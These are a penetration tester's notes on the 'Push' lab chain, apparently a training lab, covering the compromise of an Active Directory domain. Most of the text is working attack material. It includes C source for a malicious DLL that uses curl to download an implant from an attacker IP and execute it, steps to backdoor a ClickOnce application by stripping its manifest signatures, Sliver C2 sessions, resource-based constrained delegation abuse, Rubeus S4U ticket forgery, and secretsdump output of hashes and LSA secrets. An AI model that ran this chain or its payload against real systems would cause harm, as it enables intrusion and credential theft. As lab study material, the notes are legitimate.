Push (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Credentials

Username

Password

Method

Scope

olivia.wood

DeployTrust07

Leaked on FTP Service

Domain User

kelly.hill

ShinraTensei!

Found into .git files

Domain User

sccadmin

7ujm&UJM

SCCM Relay Attack

Domain User

✅ Valid Usernames

Administrator
Guest
krbtgt
svcsql
Michelle.Randall
Olivia.Wood
Declan.Hall
Lauren.Saunders
Sharon.Mitchell
Sheila.Stokes
Kathleen.Horton
Melissa.Murray
Amber.Robson
Kelly.Hill
Michelle.Dale
Alice.Young
Allan.Little
Charlotte.Reed
Barry.Murphy
Oliver.Lowe
Charles.Barber
Colin.Brown
Aaron.May
Hilary.Simpson
Leanne.Wilson
Stanley.Sharp
Mohamed.Patel
Ashley.Holden
Lewis.Wood
Bruce.Ali
Danny.Savage
Paige.Finch
Brian.Berry
Connor.James
sccadmin

🔑 Passwords list

DeployTrust07
ShinraTensei!

Password Policy

Minimum password length: 7
Password history length: 24
Maximum password age: 41 days 23 hours 53 minutes 

Password Complexity Flags: 000001
    Domain Refuse Password Change: 0
    Domain Password Store Cleartext: 0
    Domain Password Lockout Admins: 0
    Domain Password No Clear Change: 0
    Domain Password No Anon Change: 0
    Domain Password Complex: 1

Minimum password age: 1 day 4 minutes 
Reset Account Lockout Counter: 10 minutes 
Locked Account Duration: 10 minutes 
Account Lockout Threshold: None
Forced Log off Time: Not Set

Information Gathering

DC01.push.Vl

PORT      STATE SERVICE       VERSION       
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:                             
|   Supported Methods: OPTIONS TRACE GET HEAD POST           
|_  Potentially risky methods: TRACE                   
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-12 09:45:12Z)
135/tcp   open  msrpc         Microsoft Windows
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: push.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.push.vl
| Subject Alternative Name: DNS:DC01.push.vl          
| Issuer: commonName=DC01.push.vl
443/tcp   open  ssl/https                          
|_ssl-date: TLS randomness does not represent time
|_http-title: IIS Windows Server                        
|_http-server-header: Microsoft-IIS/10.0      
| ssl-cert: Subject: commonName=DC01.push.vl
445/tcp   open  microsoft-ds?                         
464/tcp   open  kpasswd5?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: PUSH
|   NetBIOS_Domain_Name: PUSH
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: push.vl
|   DNS_Computer_Name: DC01.push.vl
|   DNS_Tree_Name: push.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-10-12T09:35:36+00:00
| ssl-cert: Subject: commonName=DC01.push.vl
| Issuer: commonName=DC01.push.vl
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
61236/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
61265/tcp open  msrpc         Microsoft Windows RPC

MS01.push.vl
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT                          
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 08-03-23  08:49PM       <DIR>          .config
| 08-03-23  08:49PM       <DIR>          .git
|_08-03-23  08:49PM       <DIR>          dev
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:        
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: SelfService
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2023-10-12T09:36:17+00:00; 0s from scanner time.
| rdp-ntlm-info:   
|   Target_Name: PUSH                       
|   NetBIOS_Domain_Name: PUSH          
|   NetBIOS_Computer_Name: MS01             
|   DNS_Domain_Name: push.vl
|   DNS_Computer_Name: MS01.push.vl
|   DNS_Tree_Name: push.vl     
Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Service enumeration

DC01

DNS

Not vulnerable to AXFR

SMB

Domain SID: S-1-5-21-1451457175-172047642-1427519037
NetBIOS: DC01
Domain: push.vl
FQDN: DC01.push.vl
SMB signing: true
Server allows null session authentication

HTTP/S

Default IIS website

MS01

FTP

Anonymous FTP login allowed

SMB

SMB signing : false (Vulnerable to NTLM Relay Attacks)

HTTP

ClickOnce is a Microsoft deployment technology that allows Windows-based applications to be installed and run with minimal user interaction—often launched from a URL or shared resource. It supports sandboxing, auto-updating, and limited permission execution, but security often relies heavily on publisher configuration and system policy.

Domain

Not asreproastable users
Not kerberoastable users.

User: olivia.wood

wwwroot folder with Read and Write permission
coerce_plus
- VULNERABLE, DFSCoerce
- VULNERABLE, PetitPotam
- VULNERABLE, PrinterBug
- VULNERABLE, MSEven
Spooler service enabled
Not Webdav
Found PKI Enrollment Server: MS01.push.vl
Certificate authority - Found PKI Enrollment Server: MS01.push.vl
LDAP
- LDAP Signing NOT Enforced!
- LDAPS Channel Binding is set to "NEVER"
MachineAccountQuota: 10

Compromise MS01 Server

Download FTP files

❯ wget -m --no-passive ftp://ftp:ftp@MS01.PUSH.VL

File: .git-credentials
--------------------------------------------
https://olivia.wood:DeployTrust07@github.com

Discovering excessive permission on folder

❯ nxc smb MS01 -u 'olivia.wood' -p 'DeployTrust07'  --shares
SMB         10.10.230.150   445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:push.vl) (signing:False) (SMBv1:False)
SMB         10.10.230.150   445    MS01             [+] push.vl\olivia.wood:DeployTrust07 
SMB         10.10.230.150   445    MS01             [*] Enumerated shares
SMB         10.10.230.150   445    MS01             Share           Permissions     Remark
SMB         10.10.230.150   445    MS01             -----           -----------     ------
SMB         10.10.230.150   445    MS01             ADMIN$                          Remote Admin
SMB         10.10.230.150   445    MS01             C$                              Default share
SMB         10.10.230.150   445    MS01             IPC$            READ            Remote IPC
SMB         10.10.230.150   445    MS01             wwwroot         READ,WRITE      clickonce application dev share

Abusing ClickOnce to gain initial Access

During the enumeration the tester found a Clickonce application running on MS01. This application in together with the previously user found gave the tester the opportunity to gain initial access into the MS01 Server.

Interesting blog: Backdooring ClickOnce .NET Apps for Initial Access: A Practical Example

Creating the malicious dll payload

To compromise the Clickonce the tester proceeded to create the next DLL as follows:

#include <windows.h>
#include <stdio.h>

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH) {
        STARTUPINFOA si;
        PROCESS_INFORMATION pi;

        ZeroMemory(&si, sizeof(si));
        si.cb = sizeof(si);
        ZeroMemory(&pi, sizeof(pi));

        WinExec("cmd.exe /c curl 10.8.5.48:8081/http-vulnlabs-4444.exe -o C:\\Windows\\Temp\\http-vulnlabs-4444.exe", SW_HIDE);

        CreateProcessA(
            "C:\\Windows\\Temp\\http-vulnlabs-4444.exe",
            NULL,
            NULL,
            NULL,
            FALSE,
            0,
            NULL,
            NULL,
            &si,
            &pi
        );
    }
    return TRUE;
}

Compiling DLL on Linux

x86_64-w64-mingw32-gcc -shared -o SelfService.dll.deploy payload.c -lws2_32

Calculating HASH and Size of DLL to manifest file

stat -c%s SelfService.dll.deploy
openssl dgst -binary -sha256 SelfService.dll.deploy | openssl enc -base64

Editing SelfService.dll.manifest

<file name="SelfService.dll" size="SIZE">
  <hash>
    <dsig:Transforms>
      <dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
    </dsig:Transforms>
    <dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha256" />
    <dsig:DigestValue>HASH_BASE64</dsig:DigestValue>
  </hash>
</file>

Removing signature and publisherIdentity tags.

<publisherIdentity ... />
<Signature>...</Signature>

Changing the publicKeyToken to 0000000000000000

<assemblyIdentity ... publicKeyToken="0000000000000000" ... />

Recalculating the new edited .manifest file

stat -c%s SelfService.dll.manifest
openssl dgst -binary -sha256 SelfService.dll.manifest | openssl enc -base64

Editing SelfService.application

Updating Size, dsig:DigestValue , publicKeyToken=0000000000000000 (both) and remove signature and publisherIdentity tags.

Discovering kelly.hill's plaintext credentials

sliver (http-vulnlabs-4444) > ls

C:\Users\kelly.hill (31 items, 2.2 MiB)
=======================================
-rw-rw-rw-  .git-credential                                                                               43 B       Sat Aug 05 10:07:54 +0000 2023
<SNIF>                                                                     <dir>      Sat Sep 02 10:20:48 +0000 2023

sliver (http-vulnlabs-4444) > cat .git-credential

https://kelly.hill:ShinraTensei!@github.com

Path 1: Privilege escalation on MS01 via RBCD (Windows)

Abusing Resource Base Constrained Delegation

sliver (http-vulnlabs-4444) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe MAQ -Action new -MachineAccount z3r0 -MachinePassword Password123

[*] Output:
[+] Machine account z3r0 added

sliver (http-vulnlabs-4444) > shell
PS C:\Temp> Import-Module .\PowerView.ps1
PS C:\Temp> $ComputerSid = Get-DomainComputer z3r0 -Properties objectsid | Select -Expand objectsid
PS C:\Temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\Temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\Temp> $SD.GetBinaryForm($SDBytes, 0)
PS C:\Temp> $credentials = New-Object System.Management.Automation.PSCredential "PUSH\kelly.hill", (ConvertTo-SecureString "ShinraTensei!" -AsPlainText -Force)
PS C:\Temp> Get-DomainComputer MS01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose

VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'PUSH' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.push.vl/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'push.vl' from 'CN=MS01,CN=Computers,DC=push,DC=vl'
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.PUSH.VL/DC=push,DC=vl
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: 
(&(|(distinguishedname=CN=MS01,CN=Computers,DC=push,DC=vl)))
VERBOSE: [Set-DomainObject] Setting 'msds-allowedtoactonbehalfofotheridentity' to '1 0 4 128 20 0 0 0 0 0 0 0 0 0 0 0 
36 0 0 0 1 2 0 0 0 0 0 5 32 0 0 0 32 2 0 0 2 0 44 0 1 0 0 0 0 0 36 0 255 1 15 0 1 5 0 0 0 0 0 5 21 0 0 0 151 122 131 86
 26 61 65 10 61 54 22 85 18 14 0 0' for object 'MS01$'

Requesting TGS using S4U to impersonate Administrator

sliver (http-vulnlabs-4444) > rubeus s4u /user:z3r0$ /impersonateuser:administrator /msdsspn:cifs/MS01.push.vl /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator

[*] rubeus output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2 

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'push.vl\z3r0$'
[*] Using domain controller: 10.10.166.229:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFHjCCBRqgAwIBBaEDAgEWooIERTCCBEFhggQ9MIIEOaADAgEFoQkbB1BVU0guVkyiHDAaoAMCAQKh
      EzARGwZrcmJ0Z3QbB3B1c2gudmyjggQHMIIEA6ADAgESoQMCAQKiggP1BIID8XJ9n/CzgAurmnc+Dyo5
      yQp5wWDkBhaNYz0qWGKz4fuv9enG//t7YZEbP3dmVICd8Ibay91pyWzA7NSQZoRo1y1EWmsOnSqNoK4d
      JqkLt4DumjEEUUq01Sa2z1XXn+wYfSVM7bJwYq5ruj+LbdlBIuTgpBj8Cr8cWDHImyPDCm19pmEd0BZN
      EN1ZfUq7RcLbTPkSV0LBahZgXmRfZ3tRa319sG6GsP6ptc9DO3SpTdD9SL48gSKTDhGGvDOofa3v/hez
      68hgIDdmRaXfC1j+0vfk6nCJcpBkBG2Y1pX+nrAC9wSnwrWc6vJF5G/mOxuUCC3woYVzjfBRCTKzuBln
      J6ndm3fTqCRpE7GYFk2cVZW+MR+rLwdqy2nPaZjObDOk0cxYfwgJYB8nYgplXvSX3GzkYS8e7KM4CIIG
      mNh00mEmGbc2wRVcvTObXqaIDxUL5YRo0w6lsvm4pKmo+RpFuHwaKZN12S38El2x6mzBgJBijWNtGdq/
      Hwe6BDe0o12QeocQJl1L+VzIczsWCdbBHJq7AcYVIZaH0PcwEVL2KWg3RTXXdrhE4HljKHxuOfE+E9nI
      LZKPmwALhtvzySW7QCK7VQCUQcL2hTqpctnUiXNPnXdtPV0xEYbQ3/rerTTnKbVTbW6PhB8C37gU6Wzf
      amT4VHZlom9JsMkPSWXlwzFdKOzyBjVRMFtCQwhhIZYr5pMJ++YbNNyKv8424YbG7WliJRBNoY+8ft9R
      2c42XMIVNHLxrMOMYbS1U2iv0UtC7Vjl+apIhwhfyn64zjpRDp9VhjHb2PhuH4dZiOQ9HUP2j+TjYidH
      aYg35Bn3VDZy0CYMZxhMOrrcRnUvjQu0v97DzU7tLE2ZExeuxUOQhL+RRwQFlm9nq6aiH/SYI5dLzRQo
      sB0Z2mdptldRw+bfYE5xFkmrNuIJybf1EfQ9Imro+N3v2kslbQfY1ayykgZl95JQ2xva/5N2qv0hokKQ
      ICKKcX2aQ9eLu/Y1DQp4aQ8QvJT5s9yYR+UHKkuerRtn+/0QvdjAyEqLsIPhzp4byr/Bi/G33YcQUPt5
      O7JR6o/1fwgY6J8yS/Dr6qoIWD8ZGRU/kKbQtsRipQG8KGqPiyqtNRQOzulU1a07QgJXI6kJcq5uPTtW
      6TzRs7VJ2sYdbqGRu6BRH0RjbA1+4EgPGf2uYmueOLiZUh60QFD6ImFPD5CzS+QrFe2BbyKOySb0eYQn
      P7D2NcPAabvyD4Xj01N4JvtH+VjGY+Imbt4mtqsVuqjut8kBwuo74DoOqMvhZ/7qoR13G5vetpaXeBwv
      f/6h2cisVjiuZN3AoN8YbHRDmzfmKC1cveAcKYU2T0kxgxajgcQwgcGgAwIBAKKBuQSBtn2BszCBsKCB
      rTCBqjCBp6AbMBmgAwIBF6ESBBAZPVwcrAVWoh3ahau8lJ87oQkbB1BVU0guVkyiEjAQoAMCAQGhCTAH
      GwV6M3IwJKMHAwUAQOEAAKURGA8yMDI1MDUxMjA2MDI0OVqmERgPMjAyNTA1MTIxNjAyNDlapxEYDzIw
      MjUwNTE5MDYwMjQ5WqgJGwdQVVNILlZMqRwwGqADAgECoRMwERsGa3JidGd0GwdwdXNoLnZs


[*] Action: S4U

[*] Building S4U2self request for: 'z3r0$@PUSH.VL'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2self request to 10.10.166.229:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'z3r0$@PUSH.VL'
[*] base64(ticket.kirbi):

      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

[*] Impersonating user 'administrator' to target SPN 'cifs/MS01.push.vl'
[*] Building S4U2proxy request for service: 'cifs/MS01.push.vl'
[*] Using domain controller: DC01.push.vl (10.10.166.229)
[*] Sending S4U2proxy request to domain controller 10.10.166.229:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/MS01.push.vl':

      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
      TVMwMS5wdXNoLnZs

[*] Ticket written to administrator_cifs_MS01.push.vl

[+] Ticket successfully imported!

liver (http-vulnlabs-4444) > download administrator_cifs_MS01.push.vl

[*] Wrote 1632 bytes (1 file successfully, 0 files unsuccessfully) to /home/Intrusionz3r0/Documents/Sliver/administrator_cifs_MS01.push.vl

Dumping SAM database and LSA Secrets

❯ impacket-ticketConverter admin2.kirbi admin2.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done
❯ KRB5CCNAME=admin2.ccache impacket-secretsdump -k MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#3347d36e92ac0b3c7f9c9fff05083e09: (2023-08-31 18:27:31)
push.vl/Kelly.Hill:$DCC2$10240#Kelly.Hill#b084064849c9a1acba2fd9d4e60d6029: (2025-05-12 03:34:55)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c59b319594744abea7f2db17a2fa65c: (2023-08-31 10:26:08)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PUSH\MS01$:plain_password_hex:a8588fd11b4f63e1b5a84c2d2cdc4bcae3545f793c7228a77e1ad868edbb9e701ab3e81c4d8c864e58b3d7a01faaeff9facf4536a4129cdae629bdbf445c5a66e6bd6382f3e9184613bdb6031d6c0e04cd123e26ce746c5f0727e81e78ac7d69f2b9b7f5b5d8d8c5c8019e03a7333a5cca60683f3d9c72b0a828bcd04d36a0ba5fd99774d76d609d632641a2047be57041bd3d331872416ba5309f323219cd8d2c608e17153e731a689adfcf7a0163d84477cc1f2d60d63a61b5056a15d2ab00394db19fe60c91380a6495a824b63bf3008de0dbd74b044b5e04a4741f71a1dd224fc60e35c19eb226848814b101c6f6
PUSH\MS01$:aad3b435b51404eeaad3b435b51404ee:31fd133d27babb3790e451b6aeea7886:::
[*] DefaultPassword 
PUSH\kelly.hill:ShinraTensei!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x83f7bbd4976dba3418fe397e76d9690c06ee3691
dpapi_userkey:0xe2af091346d181301ff638320e3246e49b9b637c
[*] NL$KM 
 0000   B6 96 C7 7E 17 8A 0C DD  8C 39 C2 0A A2 91 24 44   ...~.....9....$D
 0010   A2 E4 4D C2 09 59 46 C0  7F 95 EA 11 CB 7F CB 72   ..M..YF........r
 0020   EC 2E 5A 06 01 1B 26 FE  6D A7 88 0F A5 E7 1F A5   ..Z...&.m.......
 0030   96 CD E5 3F A0 06 5E C1  A5 01 A1 CE 8C 24 76 95   ...?..^......$v.
NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Path 1: Privilege escalation on MS01 via RBCD (Linux)

Creating Computer Account

❯ impacket-addcomputer 'push.vl/kelly.hill:ShinraTensei!' -computer-name 'Intrusion' -computer-pass 'Password123'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account Intrusion$ with password Password123.

Writing msds-allowedtoactonbehalfofotheridentity attribute to MS01

❯ impacket-rbcd -delegate-from Intrusion$ -delegate-to MS01$ -action write 'push.vl/kelly.hill:ShinraTensei!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Accounts allowed to act on behalf of other identity:
[*]     z3r0$        (S-1-5-21-1451457175-172047642-1427519037-3602)
[*] Delegation rights modified successfully!
[*] Intrusion$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     z3r0$        (S-1-5-21-1451457175-172047642-1427519037-3602)
[*]     Intrusion$   (S-1-5-21-1451457175-172047642-1427519037-3603)

Requesting Ticket TGS to impersonate Administrator

❯ impacket-getST 'push.vl/Intrusion$:Password123' -spn 'CIFS/MS01.PUSH.VL' -impersonate Administrator  2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache

Dumping SAM database and LSA Secrets

❯ KRB5CCNAME='Administrator@CIFS_MS01.PUSH.VL@PUSH.VL.ccache' impacket-secretsdump -k -no-pass MS01.PUSH.VL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8614aef7e81821c71123195fd93f661:::
